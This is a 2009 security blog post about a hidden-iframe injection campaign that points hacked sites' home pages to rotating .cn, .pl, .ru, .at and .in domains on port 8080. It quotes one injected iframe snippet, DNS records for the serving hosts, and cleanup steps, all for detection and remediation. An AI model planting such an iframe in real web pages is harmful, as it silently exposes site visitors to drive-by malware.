This post is a reminder that .cn iframe attacks are still among leaders.
The URLs of malicious iframes change over the time. Hackers introduce new suffixes (campaigns?) like : mozila, banner, cocacola, pepsi, add more and more domain names.
Since the pepsi campaign they started using port 8080 in the URLs.
The currently form of the malicious code looks like this
< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>
It is usually injected at the bottom of index (home) pages.
All those .cn domains point at the same IP address, or rather, at the same group of IP addresses. Each of them can serve malicious content from 5 different servers in different countries, so that if one server is temporarily unavailable or permanently shut down, the rest four will still be working.
Here is the output of the dig command that shows 5 “A” records (June 22):
$ dig shopmoviefestival.cn
;; QUESTION SECTION:
;shopmoviefestival.cn. IN A
;; ANSWER SECTION:
shopmoviefestival.cn. 432 IN A 77 .37 .19 .173
shopmoviefestival.cn. 432 IN A 88 .191 .78 .48
shopmoviefestival.cn. 432 IN A 89 .171 .115 .10
shopmoviefestival.cn. 432 IN A 90 .156 .144 .78
shopmoviefestival.cn. 432 IN A 91 .121 .146 .101
This set of IP addresses changes over the time as some servers become unavailable. At the moment of this article publication (June 25) the set of A records looks like this:
[ 90 .156 .144 .78 ], [ 77 .37 .19 .179 ], [ 77 .37 .18 .36 ], [ 77 .37 .19 .43 ], [ 77 .37 .19 .173 ].
A couple of days ago I noticed similar hidden iframes with .pl domains in URLs.
a3h . pl:8080/ ts/ in .cgi?pepsi76 and a3l . pl:8080/ ts/ in .cgi?pepsi80
No wonder, these domains link to the same set of 5 IPs.
Update (June 29, 2009): Have found similar iframes with .ru domains in URLs: a3h .ru and a5l .ru
Update (July 8, 2009): Have found similar iframe with .at domain in URL: a3l .at
Update (July 21, 2009): Now we have .in: q3e .in and q3t .in
Here are some other domain names that you may encounter as a source parameter of those hidden iframes:
Hidden iframes are easily detected by Unmask Parasites.
You can find the clean up instructions in my original post about the .cn iframes. They include malware removal from a local computer, changing and securing FTP passwords and finally uploading a clean website copy from a backup.
Finally if your site is blacklisted by Google, request a malware review via Webmaster Tools as soon as possible. If your site is clean, the warning will be removed in a few hours.
As always, any comments are welcome.